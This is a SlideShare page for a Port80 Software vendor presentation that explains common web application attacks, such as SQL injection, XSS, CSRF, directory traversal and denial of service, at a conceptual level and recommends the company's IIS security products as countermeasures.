SlideShare a Scribd company logo

Why You Need A Web Application Firewall

Download as PPT, PDF
Port80 Software
Port80 Software

The document reviews various web application attacks and essential countermeasures, emphasizing the importance of web application firewalls (WAFs) as a defense mechanism. It outlines different types of attacks, such as SQL injection, cross-site scripting (XSS), and denial-of-service, along with strategies for mitigating these threats. Additionally, it highlights specific solutions offered by Port80 Software to protect against these vulnerabilities.

Technology
1 of 41
Downloaded 190 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Why you need a Web App Firewall and more A Review of Web Application Attacks & Countermeasures
A Review of Web Application Attacks and Countermeasures Why you need a Web App Firewall (and more) While the details of these attacks vary greatly, the key threat concepts -- and the main defensive countermeasures -- are well-understood and can be boiled down to a manageable list. Let's take a look at the major attack types that your Microsoft IIS Web servers , database-enabled Web sites and Web-based applications need to be ready for. We will also point you to the Port80 Software solutions that provide effective counter-measures to these types of attacks. There are so many types of Web-based attacks and security risks to watch out for, where do you start?
Network and System Reconnaissance Why you need a Web App Firewall (and more) Camouflage should be "standard issue" for Web servers.   The first task of a Web attacker (a cyber criminal, internal or external) is to determine your operating system, Web server, application server and database platforms.
Network and System Reconnaissance, cont. Why you need a Web App Firewall (and more) The most successful attacks are often targeted attacks , so removing or obfuscating the signatures of your technology platforms -- both obvious ones like the server name header or file extensions in HTTP, or the TCP/IP window size, as well as more subtle signatures, like cookie names, ETag formats, HTTP header order, or services running on IP/port combinations -- is an important type of countermeasure in itself.
Network and System Reconnaissance, cont. Why you need a Web App Firewall (and more) This can either dissuade intruders from attacking your Web site or Web application altogether or force them to make incorrect assumptions that lead them to try the wrong types of attacks (for instance, a Linux/UNIX hack on a Windows system). In turn, this makes it easier for firewalls and IDS systems to better identify and block those attacks directly. Port80 Solutions:   ServerMask
Image and File Leeching Why you need a Web App Firewall (and more) Do not serve Web content for others unknowingly.   A lower-priority attack that costs many sites precious bandwidth and responsiveness is a leeching attack, where a hacker identifies file resources that are not access controlled or protected by authentication on your Web site, like images and video.
Image and File Leeching, cont. Why you need a Web App Firewall (and more) They link to the file resource in your site from within their Web page, so that their Web users access your content directly (which you served and paid the bandwidth for). Unaware Web users will not know that it is actually your content that they are viewing. The solution is to make sure that Web requests for file resources on a site or application are indeed from a Web user that is on your site, not another site that has deep linked to your file resources.
Image and File Leeching, cont. Why you need a Web App Firewall (and more) The countermeasures to stop this type of leeching attack range from the simple and to the more robust, from referer checking through time-limited or "sessionized" URLs. You can also weed out the more amateurish types of leeching bots and scripts by checking the cookie, browser, and HTTP header details for each request. Port80 Solutions:   LinkDeny
Restricting Access Why you need a Web App Firewall (and more) Block IPs that are no good (up to no good or not good for you).   You can also protect against undesired use of your Web content by using IP access control to that content. This is often overlooked in sites that use authentication and authorization, but what if you need to host content for anonymous users as well -- or exclusively?
Restricting Access, cont. Why you need a Web App Firewall (and more) You may still be able to limit your audience, and hence your vulnerability to malicious requests. If for instance your site or application is designed for users in a handful of specific countries, why let users from other countries (including perhaps those known for a disproportionate share of phishing and fraud) access the Web content and endlessly probe how it is served, costing you bandwidth in the meantime? And if unwanted traffic persists from a particular Web site or IP range, why continue to treat that traffic as if it were legitimate?
Restricting Access, cont. Why you need a Web App Firewall (and more) Controlling access to Web content is by no means the same as locking down your Web server, site and application against determined exploits, but it can be a prudent deterrent to further abuse. Port80 Solutions:   LinkDeny
SQL Injection Attacks Why you need a Web App Firewall (and more) If it is going in the database, clean it up first.   SQL injection attacks attempt to use application code to access or corrupt database content. This is accomplished via a Web request where the Web user input is incorrectly filtered for string literal escape characters that can be embedded in your SQL statements (like " or *) or more generally not strongly typed or sanitized, and thereby unexpectedly interpreted and executed as SQL.
SQL Injection Attacks, cont. Why you need a Web App Firewall (and more) You can code to avoid this type of attack in your Web application, but many Web developers do not have the time or the expertise to cover the types of input sanitization required to make sure that: 1. characters passed in URL strings do not allow for unintended database access and control and 2. the type of data being passed in the URL is what was intended (for example, checking that user supplied input characters expected in a numeric field to be used in a SQL statement are indeed numeric).
SQL Injection Attacks, cont. Why you need a Web App Firewall (and more) You can also work to make the database more secure with such measures as stored procedures and least-access security privileges for accounts accessing the database. Still, you need to sanitize the inputs allowed to access the database to avoid such parser evasion attacks that try to sneak various characters in a string, allowing an attacker to add on commands to a normal variable value to delete or alter database content (or escalate their privileges on your application or server itself). Port80 Solutions:   ServerDefender AI ,  ServerDefender VP
Buffer Overflow Attacks Why you need a Web App Firewall (and more) Put some limits on data requested from unknown Web users.   Attackers love to throw huge amounts of malicious data at systems to see what limits have been set and to see if too much data crammed in a particular form field or URL string will crash the system -- or lead to remote control of your servers.
Buffer Overflow Attacks, cont. Why you need a Web App Firewall (and more) They will pack high-bit shellcode ( a transferable piece of code used as the payload in the exploitation of a software bug ) into a Web request, hoping that the developer has not placed any buffer limits on the request and is not sanitizing input into the Web application. Placing a limit on buffer characters easily helps to avoid this type of attack. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP
Cross-Site Scripting (XSS) Attacks Why you need a Web App Firewall (and more) Don't become a vector for attacks on other sites or your Web visitors themselves.   Often used in conjunction with phishing, social engineering, and other browser exploits, XSS attacks inject malicious HTML or client-side scripts into Web pages viewed by other users, thereby bypassing access controls that browsers use to make sure requests are from the same domain (same origin policy).
Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) By these means, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other client-side objects through a XSS attacks. Some XSS attacks can be tracked to DOM-based or local cross-site script vulnerabilities within a page's client-side script itself, often called non-persistent or reflected XSS vulnerabilities. When data provided by a Web user is used immediately by server-side scripts to generate a page of results for that user, and if unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.
Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) If an attacker could convince a user to follow a malicious URL which injects code into the results page, the attacker gets full access to that page's content, where many other traps can be laid for the user like: false search engine or database search results displaying hacker-designed and -controlled URLs
Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) Don't become a vector for attacks on other sites or your Web visitors themselves. Often used in conjunction with phishing, social engineering, and other browser exploits, XSS attacks inject malicious HTML or client-side scripts into Web pages viewed by other users, thereby bypassing access controls that browsers use to make sure requests are from the same domain (same origin policy). By these means, an attacker can gain elevated access privileges to: sensitive page content, session cookies, and a variety of other client-side objects through a XSS attacks.
Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) Some XSS attacks can be tracked to DOM-based or local cross-site script vulnerabilities within a page's client-side script itself, often called non-persistent or reflected XSS vulnerabilities. When data provided by a Web user is used immediately by server-side scripts to generate a page of results for that user, and if unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.
Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) If an attacker could convince a user to follow a malicious URL which injects code into the results page, the attacker gets full access to that page's content, where many other traps can be laid for the user: like false search engine or database search results displaying hacker-designed and -controlled URLs). Port80 Solutions:   ServerDefender AI ,  ServerDefender VP
Cross-Site Request Forgery Attacks Why you need a Web App Firewall (and more) Seriously, don't become a vector for indirect attacks on other sites or your visitors.   Cross-site request forgery (CSRF or XSRF), also known as a one click attack or session riding, is an exploit very similar to an XXS attack. Rather than an attacker injecting unauthorized code into a Web site, a cross-site request forgery attack only transmits unauthorized commands from a user that the Web site or application considers to be authenticated.
Cross-Site Request Forgery Attacks, cont. Why you need a Web App Firewall (and more) At risk are Web sites and applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action. These attacks are characteristic vulnerabilities of Ajax-based applications that make use of the XMLHttpRequest (XHR) API. A user that is authenticated by a cookie saved in his Web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action (for instance, withdrawing funds from a bank account).
Cross-Site Request Forgery Attacks, cont. Why you need a Web App Firewall (and more) These types of attacks are very common on Internet forums, where users are allowed to post images but not JavaScript. To combat this, URLs can be sessionized by implementing a transient authentication mechanism (such as a constantly-changing, hidden form field value) in place of persistent, cookie-based, or HTTP authentication. A simpler approach, requiring far less code rewriting, is to check that the referer in the request is from an authorized, on-site page. This can be spoofed, however, and so should not be relied upon exclusively.
Cross-Site Request Forgery Attacks, cont. Why you need a Web App Firewall (and more) For Ajax scenarios in particular, a modestly costly method for combating CSRF attacks is to require the double submission of any cookies that are used for authentication -- essentially by reading the authentication token from the cookie on the client side using JavaScript, submitting it separately with the GET or POST, and then validating it along with the cookie itself. Cookie encryption or signing also helps to defeat these attacks. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP ,  LinkDeny (weak protection)
Directory Traversal Attacks Why you need a Web App Firewall (and more) /admin, /scripts, /noaccess, /etc.   If you can get to a file via a URL, an attacker can get to it as well, even if the link is not publicly displayed on your Web site. Also known as ../ (dot dot slash), directory climbing, backtracking, and sometimes a canonicalization attack, a directory traversal attack exploits insufficient security validation and sanitization of user-supplied URL paths in Web site and application requests.
Directory Traversal Attacks, cont. Why you need a Web App Firewall (and more) This type of attack does not mean a coding deficiency, but rather a lack of security and authentication for all Web resources on a site or application. Microsoft Windows or DOS directory traversal uses the ..\ characters, although many Windows programs or APIs also accept UNIX-like directory traversal characters (../), but at least most directory vulnerabilities on Windows are limited to a single partition (C://, etc.).
Directory Traversal Attacks, cont. Why you need a Web App Firewall (and more) Though IIS can handle simple cases of directory traversal attacks, this is just a start. You need to stop requests to seemingly non-existent Web resources, sanitize inputs from all odd or non-standard character encodings, ensure document roots are known and string lengths are consistent, and also confirm that no files outside the document root of the site can be served. Of course, the best response to a directory traversal request (the only one that does not give any clues to the attacker) is a good old 404 HTTP response. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP .
Zero Day Attacks Why you need a Web App Firewall (and more) Protect against attacks before the patch and after the patch.   A zero-day (or zero-hour) attack is not so much a specific type of attack as it is a special case of all other types. A zero-day attack is one that exposes heretofore undisclosed or unpatched computer application vulnerabilities.
Zero Day Attacks, cont. Why you need a Web App Firewall (and more) Zero-day attacks take advantage of Web security holes for which no solution is currently available. 0-day exploits are released before or on the same day that the vulnerability is discovered or announced, sometimes even on the day that the vendor patch is released to the public. The term derives from the number of days between the public advisory and the release of the exploit. The name itself is an indication of the vendor patch being available, i.e. the vulnerability affected unpatched systems for zero days.
Zero Day Attacks, cont. Why you need a Web App Firewall (and more) As new attacks are introduced to IIS and application server code that often fall in the category of some of the other attacks discussed here, it is vital to have a general purpose Web application firewall covering the bases to protect the site or app from that attack vector before the platform patches can be applied. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP .
Brute Force Attacks Why you need a Web App Firewall (and more) A, B, C, D, Admin Access...   A brute force attack, sometimes called a dictionary attack, is a method of defeating a cryptographic authentication/authorization scheme by trying a large number of possible answers. The best example is exhaustively working through all possible keys in order to discover a password combination.
Brute Force Attacks, cont. Why you need a Web App Firewall (and more) Like a zero day attack, brute force attacks are often used to find open, unprotected directories or to break authentication and authorization layers. Effective request throttling, tracking and limiting the frequency of Web requests per second to a particular login file or directory, often defeats this form of automated attack. Port80 Solutions:   ServerDefender AI
Denial-of-Service Attack Why you need a Web App Firewall (and more) Too much traffic can be deadly for any Web site.   A denial-of-service attack (DoS) is an attempt to make a Web server resource unavailable to its intended users. Although there are many ways to accomplish such an attack, it generally comprises the concerted, malevolent efforts of hackers to prevent an Internet site or application from functioning efficiently or at all, temporarily or indefinitely, by flooding the site or app with an unusually high amount of Web requests, including requests that tie up resources by inducing error states.
Denial-of-Service Attack, cont. Why you need a Web App Firewall (and more) This, in turn, forces the targeted Web server to reset or consume its resources such that it can no longer serve legitimate requests. Like a brute force attack, being able to identify and block IP addresses with a high frequency of requests can stop these attacks before site resources are used up, keeping legitimate Web users in service.
Privilege Escalation Attacks Why you need a Web App Firewall (and more) Control is the ultimate goal of all attackers.   At the end of the day, almost every Web attack is an attempt to escalate privileges and gain remote control over your Web sites, apps, data and user communities. Privilege escalation is the act of exploiting a bug in an application to gain access to resources which normally would have been protected from an application or user with lower privileges.
Privilege Escalation Attacks, cont. Why you need a Web App Firewall (and more) The result is that the Web application performs actions with a higher security context that were intended for Web developers or system administrators. Buffer overflows, XSS, and CSRF are all examples of such privilege escalation attacks. Most hacks focus on getting admin privileges on the target Web site and can involve unauthorized access leading to printer protocol and remote data services attacks, even access to run the command line with administrator or the application's privileges itself. At that point, your Web server is now the attacker's Web server, and they will quickly look to attack the rest of your network from that beachhead. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP .
Defense-in-Depth Works Why you need a Web App Firewall (and more) How do you avoid being fully hacked? In general, it goes without saying that you should protect your ports and network with a standard hardware firewall, keep patching your OS, Web, app, and DB layers, authenticate secure sections of the site, and learn as much as possible about the security options in your code development on ASP, ASP.NET, ColdFusion, PHP, JSP, or other type of Web-based application.
Defense-in-Depth Works, cont. Why you need a Web App Firewall (and more) By additionally layering in Port80 Software's security solutions , you will augment these systems to directly protect your Microsoft IIS Web server, Web apps, and data from the bad guys out there on the Internet.
About Port80 Software Web Server Technologies | Part I: HTTP & Getting Started Solutions for Microsoft IIS Web Servers Port80 software exposes control to server-side functionality for developers, and streamlines tasks for administrators: Increase security by locking down what info you broadcast and blocking intruders with ServerMask and ServerDefender Protect your intellectual property by preventing hotlinking with LinkDeny Improve performance : compress pages and manage cache controls for faster load time and bandwidth savings with CacheRight, httpZip, and ZipEnable Upgrade Web development tools : Negotiate content based on device, language, or other parameters with PageXchanger, and tighten code with w3compiler. Visit us online @ www.port80software.com

More Related Content

What's hot (20)

PPTX
Owasp top 10 security threats
Vishal Kumar
 
PPTX
Owasp first5 presentation
Ashwini Paranjpe
 
PDF
OWASP Top 10 - 2017
HackerOne
 
PPTX
Owasp 2017 oveview
Shreyas N
 
PDF
Testing Web Application Security
Ted Husted
 
PPTX
Web application security
Kapil Sharma
 
PPTX
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
PPTX
Owasp top 10 vulnerabilities
OWASP Delhi
 
PPT
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
PDF
Web Application Security and Awareness
Abdul Rahman Sherzad
 
PPTX
OWASP Top 10 Vulnerabilities 2017- AppTrana
Ishan Mathur
 
PPTX
Microservices Security
Aditi Anand
 
PPT
OWASP Serbia - A3 broken authentication and session management
Nikola Milosevic
 
PDF
Owasp top 10
YasserElsnbary
 
PDF
The Complete Web Application Security Testing Checklist
Cigital
 
PPTX
Web Application Vulnerabilities
Preetish Panda
 
PDF
Realities of Security in the Cloud - CSS ATX 2017
Alert Logic
 
PDF
Security-testing presentation
Ezhilan Elangovan (Eril)
 
PPTX
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
PDF
OWASP Top 10 2017
Siddharth Phatarphod
 
Owasp top 10 security threats
Vishal Kumar
 
Owasp first5 presentation
Ashwini Paranjpe
 
OWASP Top 10 - 2017
HackerOne
 
Owasp 2017 oveview
Shreyas N
 
Testing Web Application Security
Ted Husted
 
Web application security
Kapil Sharma
 
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
Owasp top 10 vulnerabilities
OWASP Delhi
 
Introduction to Web Application Penetration Testing
Anurag Srivastava
 
Web Application Security and Awareness
Abdul Rahman Sherzad
 
OWASP Top 10 Vulnerabilities 2017- AppTrana
Ishan Mathur
 
Microservices Security
Aditi Anand
 
OWASP Serbia - A3 broken authentication and session management
Nikola Milosevic
 
Owasp top 10
YasserElsnbary
 
The Complete Web Application Security Testing Checklist
Cigital
 
Web Application Vulnerabilities
Preetish Panda
 
Realities of Security in the Cloud - CSS ATX 2017
Alert Logic
 
Security-testing presentation
Ezhilan Elangovan (Eril)
 
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
OWASP Top 10 2017
Siddharth Phatarphod
 

Viewers also liked (19)

PDF
Web Application Firewalls Detection, Bypassing And Exploitation
Sandro Gauci
 
PDF
Valtion yhteinen tietoliikenneratkaisu - VY-verkko yhdistää turvalli-sesti kä...
Valtiokonttori / Statskontoret / State Treasury of Finland
 
PPT
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
Neil Matatall
 
DOCX
External XML Entities
William McKelphin
 
PPT
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
PDF
SSRF vs. Business-critical applications. XXE tunneling in SAP
ERPScan
 
PDF
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Lionel Briand
 
PPTX
Waf bypassing Techniques
Avinash Thapa
 
PDF
SSRF workshop
Ivan Novikov
 
PDF
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
OWASP Ottawa
 
PDF
CloudFlare vs Incapsula: Round 2
Zero Science Lab
 
PPT
Advanced SQL Injection
amiable_indian
 
PDF
Sql injection with sqlmap
Herman Duarte
 
PPTX
Web application attack Presentation
Khoa Nguyen
 
PPT
Bypass file upload restrictions
Mukesh k.r
 
PDF
CloudFlare vs Incapsula vs ModSecurity
Zero Science Lab
 
PDF
Spot the Web Vulnerability
Miroslav Stampar
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
ODP
Web Application Firewall
Chandrapal Badshah
 
Web Application Firewalls Detection, Bypassing And Exploitation
Sandro Gauci
 
Valtion yhteinen tietoliikenneratkaisu - VY-verkko yhdistää turvalli-sesti kä...
Valtiokonttori / Statskontoret / State Treasury of Finland
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
Neil Matatall
 
External XML Entities
William McKelphin
 
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
ERPScan
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Lionel Briand
 
Waf bypassing Techniques
Avinash Thapa
 
SSRF workshop
Ivan Novikov
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
OWASP Ottawa
 
CloudFlare vs Incapsula: Round 2
Zero Science Lab
 
Advanced SQL Injection
amiable_indian
 
Sql injection with sqlmap
Herman Duarte
 
Web application attack Presentation
Khoa Nguyen
 
Bypass file upload restrictions
Mukesh k.r
 
CloudFlare vs Incapsula vs ModSecurity
Zero Science Lab
 
Spot the Web Vulnerability
Miroslav Stampar
 
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Web Application Firewall
Chandrapal Badshah
 
Ad

Similar to Why You Need A Web Application Firewall (20)

PDF
Top Ten Web Attacks
Ajay Ohri
 
PDF
Are you fighting_new_threats_with_old_weapons
Bhargav Modi
 
PPTX
nCircle Webinar: Get your Black Belt
nCircle - a Tripwire Company
 
PDF
375 378
Editor IJARCET
 
PDF
Web vulnerabilities
Krishna Gehlot
 
PDF
Web Application Security with PHP
jikbal
 
PPT
Web Application Security
Abdul Wahid
 
PPTX
LECTURE-DEC-6_web-application-attacks (1).pptx
JhonFrancisDuarte
 
PPTX
The Enemy On The Web
Bishan Singh
 
PDF
C01461422
IOSR Journals
 
PPT
Web Application Security
Chris Hillman
 
PPTX
CyberSecurityppt. pptx
iamayesha2526
 
PPT
Web Hacking
Information Technology
 
PDF
Web Vulnerabilities_NGAN Seok Chern
Quek Lilian
 
PDF
Owasp top 10 2013
Edouard de Lansalut
 
PPTX
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
PPT
Intro to Web Application Security
Rob Ragan
 
PDF
Web Application Security Guide by Qualys 2011
nat page
 
PDF
Qg was guide
nat page
 
PDF
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Top Ten Web Attacks
Ajay Ohri
 
Are you fighting_new_threats_with_old_weapons
Bhargav Modi
 
nCircle Webinar: Get your Black Belt
nCircle - a Tripwire Company
 
375 378
Editor IJARCET
 
Web vulnerabilities
Krishna Gehlot
 
Web Application Security with PHP
jikbal
 
Web Application Security
Abdul Wahid
 
LECTURE-DEC-6_web-application-attacks (1).pptx
JhonFrancisDuarte
 
The Enemy On The Web
Bishan Singh
 
C01461422
IOSR Journals
 
Web Application Security
Chris Hillman
 
CyberSecurityppt. pptx
iamayesha2526
 
Web Hacking
Information Technology
 
Web Vulnerabilities_NGAN Seok Chern
Quek Lilian
 
Owasp top 10 2013
Edouard de Lansalut
 
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Intro to Web Application Security
Rob Ragan
 
Web Application Security Guide by Qualys 2011
nat page
 
Qg was guide
nat page
 
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Ad

Recently uploaded (20)

PPTX
Building a Production-Ready Barts Health Secure Data Environment Tooling, Acc...
Barts Health
 
PPTX
Darren Mills The Migration Modernization Balancing Act: Navigating Risks and...
AWS Chicago
 
PDF
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
PPTX
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
PPTX
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
PDF
Blockchain Transactions Explained For Everyone
CIFDAQ
 
PDF
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
PDF
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
PDF
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
PPTX
Extensions Framework (XaaS) - Enabling Orchestrate Anything
ShapeBlue
 
PDF
Ampere Offers Energy-Efficient Future For AI And Cloud
ShapeBlue
 
PDF
How Startups Are Growing Faster with App Developers in Australia.pdf
India App Developer
 
PDF
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
PDF
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
PDF
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
PDF
Wojciech Ciemski for Top Cyber News MAGAZINE. June 2025
Dr. Ludmila Morozova-Buss
 
PDF
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
PDF
TrustArc Webinar - Data Privacy Trends 2025: Mid-Year Insights & Program Stra...
TrustArc
 
PDF
SFWelly Summer 25 Release Highlights July 2025
Anna Loughnan Colquhoun
 
PDF
July Patch Tuesday
Ivanti
 
Building a Production-Ready Barts Health Secure Data Environment Tooling, Acc...
Barts Health
 
Darren Mills The Migration Modernization Balancing Act: Navigating Risks and...
AWS Chicago
 
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
Blockchain Transactions Explained For Everyone
CIFDAQ
 
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
Extensions Framework (XaaS) - Enabling Orchestrate Anything
ShapeBlue
 
Ampere Offers Energy-Efficient Future For AI And Cloud
ShapeBlue
 
How Startups Are Growing Faster with App Developers in Australia.pdf
India App Developer
 
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
Wojciech Ciemski for Top Cyber News MAGAZINE. June 2025
Dr. Ludmila Morozova-Buss
 
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
TrustArc Webinar - Data Privacy Trends 2025: Mid-Year Insights & Program Stra...
TrustArc
 
SFWelly Summer 25 Release Highlights July 2025
Anna Loughnan Colquhoun
 
July Patch Tuesday
Ivanti
 

Why You Need A Web Application Firewall

  • 1. Why you need a Web App Firewall and more A Review of Web Application Attacks & Countermeasures
  • 2. A Review of Web Application Attacks and Countermeasures Why you need a Web App Firewall (and more) While the details of these attacks vary greatly, the key threat concepts -- and the main defensive countermeasures -- are well-understood and can be boiled down to a manageable list. Let's take a look at the major attack types that your Microsoft IIS Web servers , database-enabled Web sites and Web-based applications need to be ready for. We will also point you to the Port80 Software solutions that provide effective counter-measures to these types of attacks. There are so many types of Web-based attacks and security risks to watch out for, where do you start?
  • 3. Network and System Reconnaissance Why you need a Web App Firewall (and more) Camouflage should be "standard issue" for Web servers.   The first task of a Web attacker (a cyber criminal, internal or external) is to determine your operating system, Web server, application server and database platforms.
  • 4. Network and System Reconnaissance, cont. Why you need a Web App Firewall (and more) The most successful attacks are often targeted attacks , so removing or obfuscating the signatures of your technology platforms -- both obvious ones like the server name header or file extensions in HTTP, or the TCP/IP window size, as well as more subtle signatures, like cookie names, ETag formats, HTTP header order, or services running on IP/port combinations -- is an important type of countermeasure in itself.
  • 5. Network and System Reconnaissance, cont. Why you need a Web App Firewall (and more) This can either dissuade intruders from attacking your Web site or Web application altogether or force them to make incorrect assumptions that lead them to try the wrong types of attacks (for instance, a Linux/UNIX hack on a Windows system). In turn, this makes it easier for firewalls and IDS systems to better identify and block those attacks directly. Port80 Solutions:   ServerMask
  • 6. Image and File Leeching Why you need a Web App Firewall (and more) Do not serve Web content for others unknowingly.   A lower-priority attack that costs many sites precious bandwidth and responsiveness is a leeching attack, where a hacker identifies file resources that are not access controlled or protected by authentication on your Web site, like images and video.
  • 7. Image and File Leeching, cont. Why you need a Web App Firewall (and more) They link to the file resource in your site from within their Web page, so that their Web users access your content directly (which you served and paid the bandwidth for). Unaware Web users will not know that it is actually your content that they are viewing. The solution is to make sure that Web requests for file resources on a site or application are indeed from a Web user that is on your site, not another site that has deep linked to your file resources.
  • 8. Image and File Leeching, cont. Why you need a Web App Firewall (and more) The countermeasures to stop this type of leeching attack range from the simple and to the more robust, from referer checking through time-limited or "sessionized" URLs. You can also weed out the more amateurish types of leeching bots and scripts by checking the cookie, browser, and HTTP header details for each request. Port80 Solutions:   LinkDeny
  • 9. Restricting Access Why you need a Web App Firewall (and more) Block IPs that are no good (up to no good or not good for you).   You can also protect against undesired use of your Web content by using IP access control to that content. This is often overlooked in sites that use authentication and authorization, but what if you need to host content for anonymous users as well -- or exclusively?
  • 10. Restricting Access, cont. Why you need a Web App Firewall (and more) You may still be able to limit your audience, and hence your vulnerability to malicious requests. If for instance your site or application is designed for users in a handful of specific countries, why let users from other countries (including perhaps those known for a disproportionate share of phishing and fraud) access the Web content and endlessly probe how it is served, costing you bandwidth in the meantime? And if unwanted traffic persists from a particular Web site or IP range, why continue to treat that traffic as if it were legitimate?
  • 11. Restricting Access, cont. Why you need a Web App Firewall (and more) Controlling access to Web content is by no means the same as locking down your Web server, site and application against determined exploits, but it can be a prudent deterrent to further abuse. Port80 Solutions:   LinkDeny
  • 12. SQL Injection Attacks Why you need a Web App Firewall (and more) If it is going in the database, clean it up first.   SQL injection attacks attempt to use application code to access or corrupt database content. This is accomplished via a Web request where the Web user input is incorrectly filtered for string literal escape characters that can be embedded in your SQL statements (like " or *) or more generally not strongly typed or sanitized, and thereby unexpectedly interpreted and executed as SQL.
  • 13. SQL Injection Attacks, cont. Why you need a Web App Firewall (and more) You can code to avoid this type of attack in your Web application, but many Web developers do not have the time or the expertise to cover the types of input sanitization required to make sure that: 1. characters passed in URL strings do not allow for unintended database access and control and 2. the type of data being passed in the URL is what was intended (for example, checking that user supplied input characters expected in a numeric field to be used in a SQL statement are indeed numeric).
  • 14. SQL Injection Attacks, cont. Why you need a Web App Firewall (and more) You can also work to make the database more secure with such measures as stored procedures and least-access security privileges for accounts accessing the database. Still, you need to sanitize the inputs allowed to access the database to avoid such parser evasion attacks that try to sneak various characters in a string, allowing an attacker to add on commands to a normal variable value to delete or alter database content (or escalate their privileges on your application or server itself). Port80 Solutions:   ServerDefender AI ,  ServerDefender VP
  • 15. Buffer Overflow Attacks Why you need a Web App Firewall (and more) Put some limits on data requested from unknown Web users.   Attackers love to throw huge amounts of malicious data at systems to see what limits have been set and to see if too much data crammed in a particular form field or URL string will crash the system -- or lead to remote control of your servers.
  • 16. Buffer Overflow Attacks, cont. Why you need a Web App Firewall (and more) They will pack high-bit shellcode ( a transferable piece of code used as the payload in the exploitation of a software bug ) into a Web request, hoping that the developer has not placed any buffer limits on the request and is not sanitizing input into the Web application. Placing a limit on buffer characters easily helps to avoid this type of attack. Port80 Solutions:   ServerDefender AI ,  ServerDefender VP
  • 17. Cross-Site Scripting (XSS) Attacks Why you need a Web App Firewall (and more) Don't become a vector for attacks on other sites or your Web visitors themselves.   Often used in conjunction with phishing, social engineering, and other browser exploits, XSS attacks inject malicious HTML or client-side scripts into Web pages viewed by other users, thereby bypassing access controls that browsers use to make sure requests are from the same domain (same origin policy).
  • 18. Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) By these means, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other client-side objects through a XSS attacks. Some XSS attacks can be tracked to DOM-based or local cross-site script vulnerabilities within a page's client-side script itself, often called non-persistent or reflected XSS vulnerabilities. When data provided by a Web user is used immediately by server-side scripts to generate a page of results for that user, and if unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.
  • 19. Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) If an attacker could convince a user to follow a malicious URL which injects code into the results page, the attacker gets full access to that page's content, where many other traps can be laid for the user like: false search engine or database search results displaying hacker-designed and -controlled URLs
  • 20. Cross-Site Scripting (XSS) Attacks, cont. Why you need a Web App Firewall (and more) Don't become a vector for attacks on other sites or your Web visitors themselves. Often used in conjunction with phishing, social engineering, and other browser exploits, XSS attacks inject malicious HTML or client-side scripts into Web pages viewed by other users, thereby bypassing access controls that browsers use to make sure requests are from the same domain (same origin policy). By these means, an attacker can gain elevated access privileges to: sensitive page content, session cookies, and a variety of other client-side objects through a XSS attacks.
